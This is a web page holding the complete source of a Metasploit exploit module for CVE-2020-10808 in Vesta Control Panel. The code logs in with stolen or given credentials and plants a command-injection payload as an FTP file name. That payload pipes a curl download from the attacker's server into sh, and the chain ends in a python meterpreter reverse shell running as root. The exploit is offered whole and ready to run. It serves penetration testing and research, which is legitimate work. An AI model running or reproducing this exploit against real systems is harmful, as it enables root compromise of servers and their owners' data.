扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 |
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Ftp include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer def initialize(info={}) super(update_info(info, 'Name' => "Vesta Control Panel Authenticated Remote Code Execution", 'Description'=> %q{ This module exploits command injection vulnerability in v-list-user-backups bash script file. Low privileged authenticated users can execute arbitrary commands under the context of the root user. An authenticated attacker with a low privileges can inject a payload in the file name starts with dot. During the user backup process, this file name will be evaluated by the v-user-backup bash scripts. As result of that backup process, when an attacker try to list existing backups injected payload will be executed. }, 'License'=> MSF_LICENSE, 'Author' => [ 'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module ], 'References' => [ ['URL', 'https://pentest.blog/vesta-control-panel-second-order-remote-code-execution-0day-step-by-step-analysis/'], ['CVE', '2020-10808'] ], 'DefaultOptions'=> { 'SSL' => true, 'RPORT' => 8083, 'WfsDelay' => 300, 'Payload' => 'python/meterpreter/reverse_tcp' }, 'Platform' => ['python'], 'Arch' => ARCH_PYTHON, 'Targets'=> [[ 'Automatic', { }]], 'Privileged' => false, 'DisclosureDate' => "Mar 17 2020", 'DefaultTarget'=> 0 )) register_options( [ Opt::RPORT(8083), OptString.new('USERNAME', [true, 'The username to login as']), OptString.new('PASSWORD', [true, 'The password to login with']), OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/']) ] ) deregister_options('FTPUSER', 'FTPPASS') end def username datastore['USERNAME'] end def password datastore['PASSWORD'] end def login # # This is very simple login process. Nothing important. # We will be using cookie and csrf_token across the module so that we are global variable. # print_status('Retrieving cookie and csrf token values') res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'login', '/'), }) if res && res.code == 200 && !res.get_cookies.empty? @cookie = res.get_cookies @csrf_token = res.body.scan(/<input type="hidden" name="token" value="(.*)">/).flatten[0] || '' if @csrf_token.empty? fail_with(Failure::Unknown, 'There is no CSRF token at HTTP response.') end else fail_with(Failure::Unknown, 'Something went wrong.') end print_good('Cookie and CSRF token values successfully retrieved') print_status('Authenticating to HTTP Service with given credentials') res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'login', '/'), 'cookie' => @cookie, 'vars_post' => { 'token'=> @csrf_token, 'user' => username, 'password' => password } }) if res && res.code == 302 && !res.get_cookies.empty? print_good('Successfully authenticated to the HTTP Service') @cookie = res.get_cookies else fail_with(Failure::Unknown, 'Credentials are not valid.') end end def is_scheduled_backup_running res = trigger_scheduled_backup # # MORE explaination. # if res && res.code == 302 res = trigger_payload if res.body.include?('An existing backup is already running. Please wait for that backup to finish.') return true else print_good('It seems scheduled backup is done ..! Triggerring payload <3') return false end else fail_with(Failure::Unknown, 'Something went wrong. Did you get your session ?') end return false end def trigger_payload res = send_request_cgi({ 'method' => 'GET', 'cookie' => @cookie, 'uri' => normalize_uri(target_uri.path, 'list', 'backup', '/'), }) if res && res.code == 200 res else fail_with(Failure::Unknown, 'Something went wrong. Maybe session timed out ?') end end def trigger_scheduled_backup res = send_request_cgi({ 'method' => 'GET', 'cookie' => @cookie, 'uri' => normalize_uri(target_uri.path, 'schedule', 'backup', '/'), }) if res && res.code == 302 && res.headers['Location'] =~ /\/list\/backup\// res else fail_with(Failure::Unknown, 'Something went wrong.') end end def payload_implant # # Our payload will be placed as a file name on FTP service. # Payload lenght can't be more then 255 and SPACE can't be used because of the # bug in the backend software. Due to these limitations, I used web delivery method. # # When the initial payload executed. It will execute very short perl command, which is going to fetch # actual python meterpreter first stager and execute it. # final_payload = "curl -sSL #{@second_stage_url} | sh".to_s.unpack("H*").first p = "perl${IFS}-e${IFS}'system(pack(qq,H#{final_payload.length},,qq,#{final_payload},))'" # Yet another datastore variable overriding. if datastore['SSL'] ssl_restore = true datastore['SSL'] = false end port_restore = datastore['RPORT'] datastore['RPORT'] = 21 datastore['FTPUSER'] = username datastore['FTPPASS'] = password # # Connecting to the FTP service with same creds as web ui. # Implanting the very first stage of payload as a empty file. # if (not connect_login) fail_with(Failure::Unknown, 'Unable to authenticate to FTP service') end print_good('Successfully authenticated to the FTP service') res = send_cmd_data(['PUT', ".a';$(#{p});'"], "") if res.nil? fail_with(Failure::UnexpectedReply, "Failed to upload the payload to FTP server") end print_good('Successfully uploaded the payload as a file name') disconnect # Revert datastore variables. datastore['RPORT'] = port_restore datastore['SSL'] = true if ssl_restore end def exploit start_http_server payload_implant login trigger_scheduled_backup print_good('Scheduled backup has ben started. Exploitation may take up to 5 minutes.') while is_scheduled_backup_running == true print_status('It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...') Rex.sleep(30) end stop_service end def on_request_uri(cli, request) print_good('First stage is executed ! Sending 2nd stage of the payload') second_stage = "python -c \"#{payload.encoded}\"" send_response(cli, second_stage, {'Content-Type'=>'text/html'}) end def start_http_server # # HttpClient and HttpServer use same SSL variable :( # We don't need a SSL for payload delivery. # if datastore['SSL'] ssl_restore = true datastore['SSL'] = false end start_service({'Uri' => { 'Proc' => Proc.new { |cli, req| on_request_uri(cli, req) }, 'Path' => resource_uri }}) print_status("Second payload download URI is #{get_uri}") # We need that global variable since get_uri keep using SSL from datastore # We have to get the URI before restoring the SSL. @second_stage_url = get_uri datastore['SSL'] = true if ssl_restore end end |
体验盒子
